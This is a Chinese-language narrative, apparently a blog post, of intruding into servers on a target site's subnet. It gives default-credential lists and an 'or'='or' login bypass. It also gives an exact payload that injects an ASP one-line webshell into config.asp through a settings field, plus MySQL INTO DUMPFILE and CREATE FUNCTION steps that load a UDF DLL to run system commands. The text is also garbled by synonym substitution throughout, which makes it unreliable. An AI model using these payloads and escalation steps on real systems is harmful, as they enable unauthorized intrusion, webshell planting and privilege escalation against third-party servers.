后面做了一些补充 关于在phpmyadmin里UDF提权的一些细节
大型站点渗透的思路要么便是旁注,要么便是攻陷C段做事器嗅探。由于独立域名做事器,那么就只有从C段下手了。
用iisputscaner扫描有IIS写权限漏洞的做事器。
创造有一台可以利用,随后拿到webshell,当我费尽千心万苦提权拿到3389后,创造这台做事器跟目标不是一个网段,
中间用iisputscaner扫描开放web做事的机器。
对付80端口渗透我是这样做的:
1、首先在url后面加admin回车,看是否能进入后台管理界面,然后考试测验弱口令
admin:admin
admin:admin888
admin:123456
可以考试测验'or'='or'等
注入的办法
登录
2、还可以再url后面加login.asp,login.php等去考试测验找后台,如果无法登录后台,或者后台地址根本找不到,
那么我们可以考试测验去探求这个网站用的是哪套WEB系统。有的站点页面最下方直接就标准出来了,有的
在后台登录界面有,有的根本无法很直接的判断出是什么系统。这个时候可以找这个网站比较有点特的URL地址,
比如某站点地址有admin/previlege/login.asp; 然后googel搜索,inurl:admin/previlege/login.asp;
这样就能找到不少这样的站点,看看其他站点是否标注了哪套WEB系统。当我们知道了站点的系统后就可以搜索这套系统被公布的漏洞,
0day,exp然后就可以较快的 有目的性的进行渗透。不然就只有逐步考试测验去探求注入点,或者探求上传漏洞,比较费韶光。
根据以上思想我花了一些韶光看了好几个机器终于利用某系统新出的漏洞拿到了shell,
然后PHP SHELL实行DOS命令竟然直接就可以添加系统账户。然后上传udf.php ,
这个是提权用的,不过我创造他开3389功能不错,给这台机器开了3389。
这个时候心情比较愉悦,由于可以对我的目标机器进行嗅探了。但切切让我很忧郁的事又发生了,
我再次ping那个大型的安全站点时创造它的IP地址完备改变了,完备不是我一开始PING出来的那个地址了。
顿时 心情跌入低谷。这个时候我想要么它是动态IP?真不知道 怎么连续了。于是就停息去安歇。
第二天连续PING目标, 结果目标还是后面这个IP 不管了连续从这个IP的C段入手,再找台机器 还是按上面的思路,终极嗅探目标。
不过后面进行的C段渗透比较困难了,我机会1-255开放WEB的站点都看了,险些没有哪个站点可以很快的
拿到SHELL ,于是昨天晚上用XSCAN出来扫一圈,创造如下:
1、有几台FTP弱口令,但没任何权限
2、有台FTP弱口令, 可以上传文件,但不是WEB目录;FTP也没实行命令权限;
3、有台SQL若口令, 同样没任何权限
心中无比悲惨。
这个时候创造了一个做事器一个站点时cms3.0.0但搜索了公布的漏洞 都无法成功利用,同时还有套WEB系统,
放的是某站点是ASP系统构造。直接点 管理 进入后台登录界面 考试测验了几次 末了以admin:123456登入后台。
后台我是翻来覆去的到处看,始终没找到利用的地方。在后台 我的思路如下:
1、考试测验找到这是哪套系统。后台,管理界面都无法直接看出。只是在登录界面看源码时看到是学校管理系统9正式版。
于是搜索该系统可能被公布的漏洞,但一无所获,大概这个别系比较冷僻 关注的人很少。
2、找上传的地方,看是否有上传漏洞。我在文章编辑里找到有上传的类型还挺多 还后HTML型。
可是无论我用抓包 修正文件名办法以及1.asp;.jpg办法漏洞都无法成功,并且上传后系统自动重新命名。看来无法利用上传漏洞。
3、有个数据库备份 只是备份只能以MDB后缀,而且我点备份彷佛看起来它并没有备份可能系统有些问题。
4、考试测验把该套系统下载下来,在自己机器上看看,会不会有什么可以渗透进去的地方。我还是看的上传页面
看看是否能绕过去格式限定。
程序先判断是否在已有的许可的类型里,如果不是 就直接返回缺点;然后再过滤一道,后面这道以为有点多余。
这套系统共有6个上传页面,只是每个都这样的限定,看起来无法绕过了。
这时创造这个页面顶端 有句 :<!--#include file="Inc/upload.asp"-->
然后就看看upload.asp,结果看到便是一个 无组件上传类 。
只是在INC这个目录下 还有个config.asp就顺便看看
在后台管理界面 网站属性设置里 有这些内容,记得当时
我在上传类型里添加了asp类型,添加成功了但是便是还无法上传。
这时我想到的时 修正网站属性的同时 便是把config.asp 的内容给改了。那么我是不是可以吧一句话木马写进去?
于是就赶紧考试测验,直接 在 许可上传类型后面加一句话木马。这时我再打开config.asp创造内容
如下:
Const UpFileType="jpg|gif|png<%execute(request("3"))%>" '许可的上传文件类型
看起来写入成功了,然后立时拿客户端连接 提交 结果 失落败。
但想想 会不会是 前后 < >这些符号没关闭好?
考试测验修正 config.asp 如下 :
Const UpFileType="jpg|gif|png"%> <%execute(request("3"))%> <% ' " '许可的上传文件类型
把类型后面接一个%>把前面的闭合好,然后 插入一句话木马 然后 加<% 后asp文件末了的%>对应
后面 接 ' 是吧 末了原有的"给注释掉,
于是我先在自己系统搭建环境 进入后台 在类型后面 输入"%> <%execute(request("3"))%> <% ' 如下图
提交,然后 再看看config.asp文件:
考试测验连接一句话 shell 在 inc/config.asp
成功得到shell。
得到了后台shell后 创造没什么权限,这时我用wwwscan扫描下 web目录看看有没有什么又用的东西。
创造可以不用密码 直接登录phpmyadmin后台,
一开始在后台翻来翻去找不到什么又用的东西,找到php后台数据库mysql密文密码 也无法解密。
试图用数据库语句 into outfile 写入一句话shell 但又不知道物理路径,考试测验了网上公布的所有暴路径的办法 都无法得到
也考试测验对一些目录 loadfile 还是没得到
后面想到udf提权就找了找这方面的资料:
《Windows环境下通过MySQL以SYSTEM身份实行系统命令》
《利用mysql上传和实行文件》
《MYSQL中的UDF – Can’t open shared library 的研究》
紧张有两点思想:
第一:可以通过MySQL上传二进制文件,例如自己编写的UDF DLL;
第二:可以通过注册UDF DLL中自写的Function而实行任意命令。
自己布局mysql数据库命令如下:
DROP TABLE IF EXISTS mix;
create table mix(data LONGBLOB);
INSERT INTO `mysql`.`mix` (`data`) VALUES(0x45…………..)(二进制数据省略)
SELECT data FROM mix INTO DUMPFILE "c:\\udf.dll";
drop table mix;
成功将 二进制文件udf.dll上传到 做事器c盘目录下。
1、 在phpmyadmin里 如果表名前不带数据库名 会在天生的文件前多出半字节0。
2、 如果通过变量赋值 然后将变量插入表中 那么末了天生的文件里0字节 会变成\0。
末了终于 成功上传了udf.dll,但是在实行
CREATE FUNCTION cmdshell RETURNS STRING SONAME 'C:udf.dll'
时提示无法共享库,重新上传又提示文件已经存在。 我猜想一定时被杀毒软件拦截了。
只留下cmdshell()函数。并且把cmdshell()函数改名 为windcmd()。
然后实行 CREATE FUNCTION windcmd RETURNS STRING SONAME 'C:udf.dll'
接着:
Select windcmd(“net user”)
做事器开了3389,到此拿下了这台做事器权限!
